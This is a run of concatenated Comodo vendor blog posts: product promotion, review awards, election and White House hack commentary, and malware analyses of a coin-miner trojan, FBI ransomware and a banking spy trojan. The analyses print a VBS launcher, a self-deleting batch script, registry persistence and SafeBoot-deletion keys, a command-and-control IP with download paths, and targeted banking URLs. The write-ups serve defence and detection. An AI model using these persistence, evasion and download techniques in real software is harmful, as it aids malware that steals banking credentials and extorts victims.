This includes tasks like opening a web page from a sandboxed browser, or starting a virus database update etc.

CIS 2013 supports several protocol handlers listed below. If you want to try them, you can install CIS 2013 free. Just go to: http://www.comodo.com/home/internet-security/free-internet-security.php

1 – safe://

This protocol is used to open any URL with a sandboxed browser.

For example: Try safe://www.google.com

The URL will be open in a sandboxed browser. Note the green border:

2 – kiosk://
Like the previous one, opens the URL from COMODO Virtual Kiosk.

E.g. try kiosk://www.google.com

URL will display in a browser from the kiosk:

3 – comodo://antivirus.Update

This command can be used in a hyperlink to antivirus database update.

E.g. Update your virus database now! Link to comodo://antivirus.Update

Update should start if you clicked example above.

4 – comodo://antivirus.Scan?predefined=quick : this command starts a quick scan.

E.g. Scan your computer now! Link to comodo://antivirus.Scan?predefined=quick

You should see quick scanning started if you clicked on the link above:

We use these protocol handlers while dealing with our customers. Especially when we want them to scan their computers or update their databases through email.

Here is a link to Google’s Chrome product page for more information http://www.google.com/intl/en/chrome/devices/.

Would you like to give it a try?
No I am not going to talk about running the Chrome OS in VMware! 

Did you know that if you install COMODO Internet Security 2013, you can get a virtual Chromebook that brings a rich web application ecosystem into your computer with an elegant user experience?

That’s true.
The new “Virtual Kiosk” in 2013 edition is a virtual computer inside your computer.  It is loaded with a lot of features making it “a virtual Chromebook + more“.

App Market allows users to install new apps

As soon as the Kiosk starts, it welcomes the user with an elegant, touch friendly shell and preinstalled apps such as Angry Birds, Evernote, Gmail etc.  There is also an App Market that allows the user to choose new apps from the thousands of apps in Google’s Chrome Web Store.

Unlike the Chromebook, the Virtual Kiosk can also run legacy Windows applications such as Microsoft Word or Internet Explorer providing a superior experience.

Installing a app is a simple matter of opening the app market and choosing the app. Done!
It will appear instantly on your Desktop.

It is really simple to use. Just go ahead and try.
The latest version is available free, after all, from http://www.comodo.com/home/internet-security/free-internet-security.php

Why else would you use the Virtual Kiosk for? Here are just a few ideas:

1. Secure online banking: Virtual Kiosk prevents key loggers from sniffing your keyboard activity when you go to the banking sites.   By using its virtual keyboard, you are protected even against hardware based key loggers!
2. Secure Surfing: Whatever runs in Kiosk, stays in Kiosk! That’s right, even if you are accidentally infected by a virus, it is not going to affect your computer.  It cannot do any damage outside the Kiosk!
3. Locking down your computer: You can force users of your computer to use the Kiosk environment if they need to use your computer.For example, you can allow the kids to do whatever they want in Kiosk without changing anything in your PC.
4. A new user experience: Ever wanted to use Windows like an iPad? The touch friendly Kiosk makes that possible.

Like a Broadway show the critics will have their say. Now, we produced Comodo Internet Security 2013 (v6) for computer users everywhere and we know that you just can’t please everyone.

Then again, based on the reviews so far, maybe we can.

Since the official release of our new version we have been gratified by excellent reviews from some of the most respected and widely read resources in technology.

As of January 18, Matousec ranked us number 1 in their Internet Security Challenge, which compares 38 Windows Security Suites. Comodo was the only suite to receive a protection rating of “Excellent” and only one of three products that Matousec rated as “Recommended”.

Last week, Comodo Internet Security Complete earned the PCMag Editor’s Choice award. They gave the suite 4.5 of 5 stars and a rating of Excellent. Writing for the magazine, Neil J. Reubenking concluded “The biggest win for Comodo Internet Security Complete 2013 isn’t in features, but in support. The GeekBuddy service fixes any problem, security or otherwise, using remote assistance. A Virus-Free Guarantee reimburses you for damage if malware gets past Comodo; you can also get reimbursed for expenses related to identity theft. Add a GeekBuddy-powered tuneup tool and an unusually powerful backup utility and you’ve got a winner. “

In a January 9, 2013 review, Techworld.com awarded Comodo Internet Security Pro 2013 4 of 5 stars. They concluded “Cloud-based scanning and behavior analysis joins a suite of top-notch security tools, designed to keep your PC secure. Recommended.”

In a January 9, 2013 review of Comodo Internet Security Pro 2013, Mike Williams of BetaNews.com concluded “the average user will appreciate its largely automatic operation, though, while experts enjoy the powerful tools and extreme configurability.” He was particularly impressed with the bundling of the firewall, killswitch and Geek Buddy.

When a show is a hit there is often a sequel. In our case, you can bank on it.

That’s because while the threats to internet security keep increasing, the technology that we have available to combat those threats is improving rapidly. The Comodo team knows that a safer internet requires continuous improvement and innovation.

That’s why you can bank on Comodo for the best in Internet Security, which also offers Free Internet Security software.

As of January 18, 2013, the independent tester of security software ranked Comodo Internet Security 2013 Premium (v6) number 1 in tests of 38 internet security suite.  Moreover, Comodo was the only suite to receive a rating of “Excellent” and only one of three products that Matousec rated as “Recommended”!

The Challenge is conducted on an ongoing basis. Each of the 38 participants in the Matousec rankings has been tested at least once in the past 6 months

In their summary report, Matousec stated “After quite a long time we have a new version of Comodo Internet Security here in Proactive Security Challenge 64. Comodo Internet Security confirmed its number one position on the field of Windows proactive security once again.

Who is Matousec?

They are an independent project run by security experts dedicated to improving end user security. They not only do testing and research, they have worked with vendors to introduced innovative security solutions.

According to their web site “We want to participate in the global security research, provide independent software testing, support other companies and software vendors with similar orientation in their activities, and help with the development of their security products.”

What was so challenging about “The Challenge”?

They wouldn’t call it a “Challenge” unless it very was demanding.  The tests are organized into a series of increasingly difficult levels to pass.  The software must pass one level to proceed to the next.

The tests come from 6 categories of tests:

• Leak-test: Tests that try to send data to the Internet server.
• Spying test: These tests typically use Keylogger and packet sniffer software to attempt to spy on users’ input or data.
• Autorun test: These tests determine if test software can download, install itself and survive the computer being rebooted.
• Self-defense test: This refers to a group of tests that attempt to shut down or damage the security itself.
• Other: Miscellaneous tests that do not fit into the other categories.

The tests are conducted on virtual Windows 7/Vista machines under Administrative rights with the User Account Control (UAC) turned off. Matousec’s research indicates that this is the most common real world configuration.

Time for a victory lap?  Not today!

The list of software included in the challenge includes well-known names and obscure, industry giants and small fry, costly systems and free.

Today, Comodo stands above them all.

You might say this is like winning the Super Bowl of internet security!  However we are winning a game that never ends.  There are no timeouts, no final whistle. There is no off season when we can relax and admire our trophies,

An enormous amount of effort went into the new version of Comodo Internet Security, but don’t think we are sitting on our laurels. We are working every day to meet one of the greatest challenges of our generation, creating trust online

Sure enough, zero-day exploit vulnerabilities have been identified in compromised Java web sites.  Oracle has rushed out a patch to deal with these problems, one of which is a bug that some analysts feel should have been fixed when the August exploits were revealed.

As the great Yogi Berra would say, “It’s Déjà vu all over again!”

These vulnerabilities are as serious as they can get. They can be used to trick your browser and operating system into downloading malicious software from a compromised web site and escalating the malware’s system rights.  If it can do that, the hackers can do anything they want to harm or control your compute.

There are reports that criminal toolkits, available on the internet, have been updated to exploit these Java zero-day vulnerabilities. Sadly, there is a big market for these toolkits.

Perhaps you enjoy having a zombie computer that sends out junk email, commits click fraud or is part of denial of service attacks. Maybe you aren’t worried about someone stealing your personal information for financial fraud.  And your hard drive might not be important enough to you that you care if somebody messes.

As for me, I opt out!

In response to the August Java zero-day exploits, I published an article titled, “Java Zero-day Exploits: Why I am Not Worried”. My reason then for being unconcerned is the same reason today I am STILL not worried.

My computers are protected by our Comodo Internet Security 2013 antivirus.  Other antivirus systems compare programs to a file of known viruses and malware, which requires constant updates to the file.   There are thousands of new viruses introduced every day!

Comodo uses a “default deny” system that will run any program that it is not sure of in an isolated system area called a sandbox. The chances of any malware ever impacting your system are dramatically reduced,  even when they haven’t been identified yet by the internet security community.

How dramatic?  Enough that Comodo provides a $500 guarantee that your computer will not be harmed from malware when protected with its antivirus.

So, no worries.

Not only that, Comodo Internet Security 2013 has new protections.  If I want to make absolutely sure a Java application is safe, I can run it in our new Virtual Kiosk.  The Kiosk is a virtual windows desktop complete with icons for running your favorite programs, as shown below:

Like our Auto Sandbox Technology, a malicious application running in the Virtual Kiosk can’t harm the rest of the computer. You can even use a virtual keyboard that protects you from spyware that record your keystrokes, as shown in the example .

You can also choose to run a program in the sandbox. For example, if you need to use a Java enabled web site and are concerned by the recent warnings, simply run the browser in the sandbox. The browser window will have a green shade around it to let you know that you are protected.

Comodo is great for the user who wants to “set it and forget it”, but for those want to go under the covers and manage at a lower level they provide tools like the Killswitch window, shown in the example below:

In this example, the programs shaded in gray are running “virtualized” in the sandboxed.  The Killswitch includes a rating to help you know if a program can be trusted, and options to halt and delete a program if it can’t.

Comodo has a proactive approach to fighting malware. The sandbox and Virtual Kiosk protect you against any untrusted program, not just known threats like the new Java exploits.  We provide solutions that will protect against malware not yet invented and exploits not yet found.

So what is Bitcoin and how does it work? Well, unlike traditional currency, which is generated through a central authority like an issuing bank, Bitcoins are dynamically generated as and when required through a decentralized peer-to-peer network of nodes – or ‘miners’. Each ‘miner’ is a set of computer resources (sometimes just a regular computer like the one on your desktop) that has been devoted to dealing with Bitcoin transactions. Once there have been enough of these transactions, they are grouped into a ‘block’ – and this additional block of transactions is then added to the master ‘block chain’ that is maintained across the greater Bitcoin network. The key thing to note here is that the process of producing a ‘block’ is very hardware intensive and requires a great deal of computing power. So, in return for volunteering their hardware, miners that manage to generate a block are rewarded with a bounty of Bitcoins and given any transaction fees from that block. This system of granting rewards to miners is actually also the mechanism by which the Bitcoin money supply is increased.

As mentioned, the computational demands of producing a block are very high so the more processing power an entity can use, the more transactions they can handle and the more Bitcoins they are liable to receive. And what better source of computational power to a hacker than his own network of zombie PCs relentlessly crunching out Bitcoin transactions?

The trojan that installs the mining components is 80KB in size and, upon execution, it decrypts in memory a PE file located in the .code section, at 0×9400, size 0xAA00. Decryption is a simple byte XOR, with 20 successive byte keys located in .idata section. The installation steps are taken by the new decrypted in-memory process which downloads the necessary components and also contains the mining parameters (like user and password credentials for the mining pool, all encrypted in resources).

The encrypted file is packed with UPX. Important resources present in file:

Encrypted OTR0 resource

It contains running parameters and credentials for mining pool ("-t 2 -o http://user:password@server.com:port". The -t parameter stands for the number of threads used for calculations. The -o parameter specifies the server to connect to.

Decryption reveals address and credentials for pool server

OTR2 – [7C 6E 6C 63 60 76 25 66 7F 68] – name of the dropped mining file (socket.exe)
OTR8 – [7C 6E 6C 63 60 76 78 2D 62 75 60] – name under which the file self-copies (sockets.exe)
OTR9 – [6F 41 6F 58 45 42 6B 43 47 6D 75 52 46 65 76 51 43] – decrypting key for encrypted resource strings (this will be used to decode the string parameters stored as resources)

The file copies itself to My Documents\Windows\sockets.exe and executes the copy.

After execution, it downloads the following files:

- 142.0.36.34/u/main.txt – A mining binary saved as "socket.exe", which seems to be a modification of a known open-source mining application.
- 142.0.36.34/u/m.txt – A plain text file containing hex values of a binary PE will be transformed into "miner.dll", a dependency of the previous.

- 142.0.36.34/u/usft_ext.txt – A binary file, dependency saved as "usft_ext.dll".
- 142.0.36.34/u/phatk.txt – Saved as "phatk.ptx" – assembler instructions for GPUs, which can be used for advanced calculations.
- 142.0.36.34/u/phatk.cl – Saved as "phatk.cl" – source file designed for GPU calculations.

When all downloads are complete and dependencies are in place, the mining binary is launched with decoded parameters and starts making calculations to generate virtual coins. As predicted, the CPU usage rises, keeping the computer in high load.

The malicious binary repeatedly communicates with the pool server upon finishing computational cycles and sends the results of its calculations – the "virtual coins".

Dropper trojan:
Filename: sockets.exe
SHA1: 52647f52912e81e0351b68e30a3b13fe4501bdda
MD5: ba9c16fa419d24c3eadb74e016ad544f
CIS detection name: TrojWare.Win32.Trojan.CoinMiner.k

Mining binary:
Filename: socket.exe
SHA1: 1da22ddd904dfa0664a50aa6971ad1ff451651ce
MD5: e82cd32fefb2f009c84c14cec1f13624
CIS detection name: Application.Win32.CoinMiner.b

It might come as a surprise, but malware authors use this precise security technique for the same reasons. Like you, they don’t want their files to read by any 3rd party apart from the intended recipient. In this case, the 3rd party is a static antivirus scanner on an email gateway, public hosting or users machine. The intended recipient is the victim of a malware scam.

Although malware inside a password protected archive cannot be detected by the AV scanner, this doesn’t guarantee it will be successful. Encryption only grants the malware safe passage through the Internet and (they hope) onto the victim’s machine. Once the malware starts to run, the real-time virus-detection provided by most popular security software will neutralize the threat. Of course, this relies on the end-user actually having an AV installed – and this is the strategy of the malware author.

There will always be a percentage of home and business users that do not have real-time anti-virus running. They don’t expect every instance of their malware to score a hit, but by distributing it in such massive volumes, they also know that it will be successful in a significant number of cases.

We recently spotted malware using this exact approach:

Looks like the author expressed himself in the file properties:

A simple Google search for “MrFreeCrypt” returns Russian language results for a “New generation of cryptors”:

CryptService!!! Новое поколение крипторов. Online 24/7 fud 0/44.
гарантия от 24 часов. ICQ: 6*******7 jabber: mrfreecrypt@j****r.ru
----
CryptService!!! New generation of cryptors. Online 24/7 detection 0/44.
guarantee of 24 hours. ICQ: 6*******7 jabber: mrfreecrypt@j****r.ru

We can’t state for sure it’s the same person, but it seems a pretty large coincidence.

The file itself is a ’7-zip’ self-extracting archive with two files inside:

   Date      Time    Attr         Size   Compressed  Name
------------------- ----- ------------ ------------  ------------------
2012-10-21 10:54:14 ....A          107           95  stub.vbs
2012-10-24 16:15:24 ....A       113359        61353  sfx.exe
------------------- ----- ------------ ------------  ------------------
                                113466        61448  2 files, 0 folders

“stub.vbs” is a simple Visual Basic Script which runs “sfx.exe” with the following command line parameter:

Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "sfx.exe  -pfdhtu578h4j45nh49856856hyg"

“sfx.exe” is another self-extracting archive with only one executable inside – the actual malware component:

   Date      Time    Attr         Size   Compressed  Name
------------------- ----- ------------ ------------  ------------------
2012-10-25 00:15:16 ....A        20480        11712  input.exe
------------------- ----- ------------ ------------  ------------------
                                 20480        11712  1 files, 0 folders

Rather than ’7-zip’, “sfx.exe” is inside a different type of archive known as a ‘RAR’ file. The RAR file is also password protected and encrypted. The interesting part here is that the RAR accepts the decryption password as a command line parameter “-p”. The “stub.vbs” script provides the password in this way. The chain looks so far looks like this:

[7-zip SFX] → stub.vbs → password → [RAR+password SFX] → malware

As mentioned earlier, this does not mean the malware will ultimately be successful. As soon as the file is executed on the local file system, it becomes subject to detection by real-time antivirus scanners. However, it works fine against static scanners on cloud storage services, user initiated ‘on-demand’ scans or the static scanners on email gateways. This becomes a bit more alarming when you consider this means it will avoid detection by major mail providers like Yahoo, Google, Hotmail and others. Because of this, users must take care to help protect themselves. First and foremost, install an anti-virus program from a reputable vendor. Secondly, don’t just open attachments on a mail you weren’t expecting, on mails from people you don’t know or on mails that look suspicious or spam-like.

The actual malware component is “FBI” ransom-ware.

It installs itself as an auto-run application via the following registry value:

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"GoogleChrome"="C:\\DOCUME~1\\User\\LOCALS~1\\Temp\\RarSFX0\\input.exe"

It protects itself from removal by disabling “Safe Mode” and “Safe Mode with Networking” by deleting the following registry keys:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\*
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\*

It then blocks user input and displays a fake, ‘lock screen’ which tries to extort money from the victim. The screen informs the victim that their computer has been locked by the FBI for suspected misuse and they must pay a fine within 48 hours to unlock it.

The dropper (installer) component of the malware was digitally signed by a trusted Certificate Authority. Because the installer was ‘trusted’, it was then able to evade detection by the heuristic and Host Intrusion Protection Systems (HIPSs) of many popular Antivirus and Internet Security programs.

Upon execution, the dropper first determines the architecture of the Windows operating system (32-bit or 64-bit) then extracts the appropriate main module from “PE” (Portable Executable) file resources.

The file name of this main module is generated by concatenating two named fragments from two random “*.exe” (Windows Executable) files in the Windows system folder. For example “diskpart.exe” (Windows text-mode command interpreter) and “eventvwr.exe” (Microsoft Event Viewer) generates the file name “disktvwr.dll”.

The main module is the PE “DLL” (Dynamic Link Library of functions and other information that can be accessed by a Windows program) which is placed in the Windows system folder under this generated name. It is then injected into the operating system process “explorer.exe” (Windows Explorer).

It is configured for automatic injection into most operating system processes and user applications via a randomly named value of an obscure Windows Registry key (similar to a folder):

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\AppCertDlls]
"ddeskeys"="C:\\Windows\\system32\\disktvwr.dll"

As a result, the function “CreateProcessNotify”, exported by the malware “module” (portion of the program that carries out a specific function and may be used alone or combined with other modules of the same program), is requested at the creation of each new process. This causes the malware DLL to be injected in most operating system processes and user applications.

After this operation, the dropper removes itself via the execution of a simple “DOS” (Disk Operating System) “BAT” (batch) script file:

1342562.bat:
attrib -s -r -h%1
:hkiflg
del %1
if exist %1 goto hkiflg
del %0

The main module is injected into the “explorer.exe” process and acts as a server application. It opens a “pipe” (named temporary software connection between two programs or commands) as a 128-bit Unique ID (UID), for example “\\\\.\\pipe\\{b2459e76-035d-2d18-0a97-debbcce1c0a5}”, and waits for incoming messages. Modules injected into other system processes and user applications act as “clients” (applications or systems that access a service made available by a server) and communicate with the server via the named pipe.

Modules injected into “iexplore.exe” (Microsoft Internet Explorer) and “firefox.exe” (Mozilla Firefox) web browser applications are used for communication with the remote control server. This tricks any firewall and HIPS technology by making network activity generated by the malware appear to have been initiated by the user. The current version of the malware does not support other browsers like “chrome.exe” (Google Chrome), “opera.exe” (Opera), and “safari.exe” (Apple Safari). To circumnavigate this issue, it prevents these browsers from opening and forces the user to use one of the supported browsers instead. The malware communicates with its remote control server by imitating access to a forum topic. Initially it sends an “HTTP” (Hypertext Transfer Protocol) “POST” (request method to request that the web server accepts the data enclosed in the request message’s body) for storage using a “URL” (Uniform Resource Locator global address of a web page on the World Wide Web) of following format:

http://*.*.*.*/viewtopic.php?f=159&t=17216&sid5=c0dcd0254daef45e27b86c3b5995a14c

…with the request body containing basic information about the user’s system and the installed malware module:

“user_id=1110380395&version_id=42&socks=0&build=32940&crc=50838475&
win=Microsoft+Windows+XP+Professional+Service+Pack+3+(build:+2600)&arch=x86+32bit&user=Admin”

It will then receive an updated configuration file from the remote server. The malware stores the configuration and version information in a Windows Registry key named using a 128-bit UID in a similar way that has been used for the named pipe:

[HKEY_CURRENT_USER\Software\AppDataLow\{21414dba-01d1-50fc-8e2b-a28ff0952499}]
"k1"=dword:b12564d0
"k2"=dword:473d87bb
"Version"=dword:0000002a
"Data"=hex:ca,2b,09,00,1b,e1,80,02,41,4c,3a,45,42,43,61,5f,09,31,39,36,cd,2f,\
...

The primary purpose of this malware is to steal personal information such as bank information or credit card accounts. This is a list of URLs monitored by the malware according to a recent configuration file:

bankofamerica.com/accounts-overview/accounts-overview.go
bankofamerica.com/login/sign-in/signOnScreen.go
bankofamerica.com/login/sign-in/validatePassword.go
bankofamerica.com/myaccounts/
barclaycardus.com/app/ccsite/logon/loginUserDyn.jsp
billmelater.com/login/challenge.xhtml
billmelater.com/your-account/home.xhtml
bofa.com
chaseonline.chase.com/gw/secure/ena
chaseonline.chase.com/MyAccounts.aspx
chaseonline.chase.com/secure/Profile/UpdateContactInfo/UpdateContact.aspx
client.schwab.com/Accounts/
client.schwab.com/Accounts/Summary/Summary.aspx
client.schwab.com/Service/MyProfile/MailingAddress.aspx
consumercenter.gogecapital.com/consumercenter/homeaction.do
discovercard.com/cardmembersvcs/achome/homepage
mbwebexpress.blilk.com/Core/Authentication/MFAPassword.aspx
mfasa.chase.com/auth/auth-stoken-osl.html
online.americanexpress.com/myca/acctmgmt/
online.citibank.com
online.wellsfargo.com/das/cgi-bin/session.cgi
onlinebanking.pnc.com/
onlinebanking.tdbank.com/login.asp
paypal.com/us/cgi-bin/webscr?cmd=_account
paypal.com/us/cgi-bin/webscr?cmd=_login-done
safe.bankofamerica.com/myaccounts/accounts-overview/accounts-overview.go
safe.bankofamerica.com/myaccounts/brain/redirect.go
safe.bankofamerica.com/myaccounts/signin/signIn.go?isSecureMobil
servicing.capitalone.com/C1/Accounts/Summary.aspx
shop.aafes.com/shop/Login.aspx
shopmyexchange.com
sitekey.bankofamerica.com/sas/signon.do
sitekey.bankofamerica.com/sas/signonSetup.do
sitekey.bankofamerica.com/sas/verifyImage.do
ss2.experian.com/securecontrol/reset/ssphome
suntrust.com/portal/server.pt
us.etrade.com/e/t/accounts/accountsCombo
us.hsbc.com/1/2/!ut/
wwws.ameritrade.com/cgi-bin/apps/SecurityChallenge

Once a user accesses one of the monitored URLs, the malware generates a phishing page which asks the user to enter their account details (including user-name, password and credit card number) under the pretense of either recovering their account password or to enable additional security measures:

File information:

Dropper EXE:
Size: 285264
SHA-1: b9f07c2eec5277bfc91d4bb9b8bac4e8d4cc8632
Signature: TrojWare.Win32.TrojanSpy.Volisk.a

x86 DLL:
Size: 88576
SHA-1: ba7f13855e7ad9c32917188281c4420cef8a830e
Signature: TrojWare.Win32.TrojanSpy.Volisk.a

x64 DLL:
Size: 98304
SHA-1: 372c2eafd39b317e6a94e84d673d394b2afd4b3f
Signature: TrojWare.Win32.TrojanSpy.Volisk.a

Diagnosis, Removal & Protection Instructions

If your computer doesn’t have an Antivirus or Internet Security program installed and you believe it may have been infected by “malware” (malicious software):

1. Download Comodo Antivirus and perform a full scan with up-to-date antivirus database.
2. Remove Malware Found by choosing from recommended options and stay protected.

When pressed about the removal of the troops from Afghanistan President Obama gave a very specific exit strategy that starts with the withdrawal of troops at the end of 2012 to the passing of the security controls over to the Afghan forces by 2014. Romney has stated that he felt this was a move meant to accommodate the current economic climate in the United States and that he would not have based his decisions on the economy but rather the politics of the withdrawal.

Healthcare has been another huge issue between the two candidates. President Obama has been working on his Patient Protection and Affordable Care Act (also known to the public as ObamaCare) or “ACA”; which has drawn a lot of criticism from the Republican Party. While the ACA was passed by congress in March of 2010 and the Supreme Court recently approved its constitutionality, it is still being criticized outwardly. Romney has stated he also has a plan (known to the general public as RomneyCare) which was put into place in his home state of Massachusetts and would build upon those attributes on a larger scale if he is elected.

The federal budget has been at the top of the list to anyone following the campaign. Obama wants to allow the Bush era tax cuts to expire and would continue to reduce the deficit by about $4 trillion over the course of 10 years (this includes 2012). President Obama has issued a 53 paged report detailing his entire plan. Romney on the other hand wants to make all the Bush era tax cuts permanent while making some specific cuts, which he made public during his campaign and the debates. These cuts would include: Repealing the Affordable Care Act, cutting funds to PBS and to reduce the federal workforce by 10%, just to name a few.

Could these two have agreed on anything over the last 18 months?

Now, after all of that, is it possible that they could have agreed on anything? The answer is surprisingly, yes! Both of their websites, BarackObama.com and MittRomney.com, both require protection. They have responded to this necessity by protecting their sites with one of the best internet security companies on line today: Comodo.

Comodo has been, as their motto states, “Creating Trust Online” for almost fifteen years and has the distinction of working hand in hand with many top companies around the world in protecting not only their websites but also utilizing their Internet Security software to defend against viruses and malware. Comodo has a wide variety of products that include SSL Certificates, Internet Security, Browsers, Cloud and Backup services, just to name a few of their products.

It is good to see that these two political heavyweights, regardless of their views and opinions on countless topics, can at least agree on one very important thing.

Who says nothing classified was stolen?
Well, an administration official and an unnamed source on background. (Politico, 10/2012)

Well, that’s good then. Government officials always tell the truth.

Exactly what was hacked into? An email system.
Whose email system? It was just the White House Military Office.

Great! Not like they got into the West Wing and were monitoring the Prez’s love letters to Michelle or his iPod playlist!

So, what exactly does the White House Military Office do?
They are in charge of the President’s Nuclear Football. I know, he is more of a golf and basketball guy.

But this is a very special football. It has the codes that the President could use to launch nuclear missiles and start World War III. And they also arrange the Presidents travel and communication plans!

That may sound serious, but not to worry!
An Administration National Security official says it was just a “Spear Phising Attack”. That’s where a hacker uses emails disguised as from a trusted source in order to get recipients to reveal classified information or become infected by malware. (Washington Free Beacon, 9/30/12)

Sounds bad, but the Administration official also said such attacks are “not infrequent” and there are unspecified “mitigation measures in place”.

I guess they know what they are doing. This is the US Government, after all.

But wait! He said this is “not infrequent”!
That means it happens a lot!

I sure hope they are using Comodo Internet Security Pro 2012, the best antivirus and firewall software!

Most malware protection systems use a “blacklist” of known threats to screen files.  The problem with this approach is that the list has to be constantly updated and they can’t protect against threats not yet identified. As former Defense Secretary Donald Rumsfeld once said, the thing that you keeps you up at night are the thing that you don’t know and you don’t know that you don’t know them!

With 40,000 new malware unleashed every day it is a lot of work maintaining a blacklist.

Comodo’s antivirus system uses a “whitelist” approach. The scanner uses a list of known valid programs to allow only safe programs to run in the system.  For any other software it allows it to run in a separate, isolate system called a “sandbox”. The scanner monitors the program in the sandbox and can identify if it is safe or not.

If the White House has trouble with computer hackers than everyone is at risk.  Never open email if you have any suspicions as to the source and use Comodo Internet Security Pro 2012.